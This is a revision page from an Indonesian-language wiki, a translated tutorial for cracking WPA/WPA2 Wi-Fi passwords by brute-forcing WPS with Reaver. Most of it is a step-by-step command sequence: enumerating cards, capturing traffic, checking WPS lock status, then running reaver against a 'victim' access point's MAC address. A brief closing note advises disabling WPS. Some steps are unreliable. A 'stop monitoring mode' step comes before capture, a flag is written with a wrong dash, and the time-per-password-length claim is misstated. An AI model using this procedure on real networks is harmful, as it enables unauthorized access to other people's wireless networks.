Difference between revisions of "Reaver: 5 Langkah Menjebol WPA"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (New page: Sumber: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password A flaw in a feature added to Wi-Fi, called Wi-Fi Protected Setup (WPS), allows WPA and WPA2 s...) |
Onnowpurbo (talk | contribs) |
||
Line 2: | Line 2: | ||
− | + | Sebuah cacat dalam fitur ditambahkan ke Wi-Fi, yang disebut Wi-Fi Protected Setup (WPS), memungkinkan WPA dan WPA2 keamanan harus dilewati dan efektif rusak dalam banyak situasi. Banyak Access Point memiliki Wifi Protected Setup (WPS) diaktifkan secara default (bahkan setelah hard reset Access Point). | |
==Kebutuhan== | ==Kebutuhan== | ||
Line 11: | Line 11: | ||
==Langkah== | ==Langkah== | ||
− | + | ===Cek wireless card=== | |
airmon-ng | airmon-ng | ||
− | + | Perintah ini akan memberikan daftar wireless card yang menempel pada komputer. | |
− | + | ||
+ | ===Stop monitoring mode=== | ||
airmon-ng stop wlan0 | airmon-ng stop wlan0 | ||
− | + | ===Capture traffic wifi=== | |
+ | |||
airodump-ng wlan0 | airodump-ng wlan0 | ||
− | + | Informasi yang diberikan: | |
− | |||
− | |||
− | + | * BSSID (Basic Service Set Identification): the MAC address of access point | |
− | + | * PWR: Signal level reported by the card. | |
− | + | * Beacons: Number of announcements packets sent by the AP | |
− | + | * #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets. | |
− | + | * #/s: Number of data packets per second measure over the last 10 seconds. | |
− | + | * CH: Channel number (taken from beacon packets). | |
− | + | * MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. | |
− | + | * ENC: Encryption algorithm in use. | |
− | + | * CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2. | |
− | + | * AUTH: The authentication protocol used. | |
− | + | * ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated. | |
− | + | ===Cek WPS di enable di AP=== | |
wash -i wlan0 -c 8 -C -s | wash -i wlan0 -c 8 -C -s | ||
− | + | Jika WPS Locked status adalah No, kita siap untuk meng-crack - lanjutkan. | |
− | + | ===Crack WPA2 menggunakan reaver=== | |
reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360 | reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360 | ||
− | + | Untuk AP yang spesifik, misalnya | |
reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360 | reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360 | ||
− | 5 | + | Akan membutuhkan 5 jam-an untuk meng-crack 19 karakter di WPA2 password. |
− | |||
− | |||
− | + | ==Kesimpulan== | |
− | |||
− | |||
+ | * WPA dan WPA2 security di implementasikan tanpa Wi-Fi Protected Setup (WPS) tidak akan terpengaruh oleh vulnerability ini. | ||
+ | * Kita perlu mematikan fitur WPS/QSS di access point. | ||
Revision as of 09:01, 12 December 2015
Sumber: http://www.hacking-tutorial.com/hacking-tutorial/wifi-hacking-cracking-wpa2-password
Sebuah cacat dalam fitur ditambahkan ke Wi-Fi, yang disebut Wi-Fi Protected Setup (WPS), memungkinkan WPA dan WPA2 keamanan harus dilewati dan efektif rusak dalam banyak situasi. Banyak Access Point memiliki Wifi Protected Setup (WPS) diaktifkan secara default (bahkan setelah hard reset Access Point).
Kebutuhan
- Wireless card (support promiscuous mode)
- Access point with WPA2 and WPS enables
Langkah
Cek wireless card
airmon-ng
Perintah ini akan memberikan daftar wireless card yang menempel pada komputer.
Stop monitoring mode
airmon-ng stop wlan0
Capture traffic wifi
airodump-ng wlan0
Informasi yang diberikan:
- BSSID (Basic Service Set Identification): the MAC address of access point
- PWR: Signal level reported by the card.
- Beacons: Number of announcements packets sent by the AP
- #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
- #/s: Number of data packets per second measure over the last 10 seconds.
- CH: Channel number (taken from beacon packets).
- MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
- ENC: Encryption algorithm in use.
- CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
- AUTH: The authentication protocol used.
- ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.
Cek WPS di enable di AP
wash -i wlan0 -c 8 -C -s
Jika WPS Locked status adalah No, kita siap untuk meng-crack - lanjutkan.
Crack WPA2 menggunakan reaver
reaver -i <your_interface> -b <wi-fi victim MAC address> –fail-wait=360
Untuk AP yang spesifik, misalnya
reaver -i wlan0 -b E0:05:C5:5A:26:94 –fail-wait=360
Akan membutuhkan 5 jam-an untuk meng-crack 19 karakter di WPA2 password.
Kesimpulan
- WPA dan WPA2 security di implementasikan tanpa Wi-Fi Protected Setup (WPS) tidak akan terpengaruh oleh vulnerability ini.
- Kita perlu mematikan fitur WPS/QSS di access point.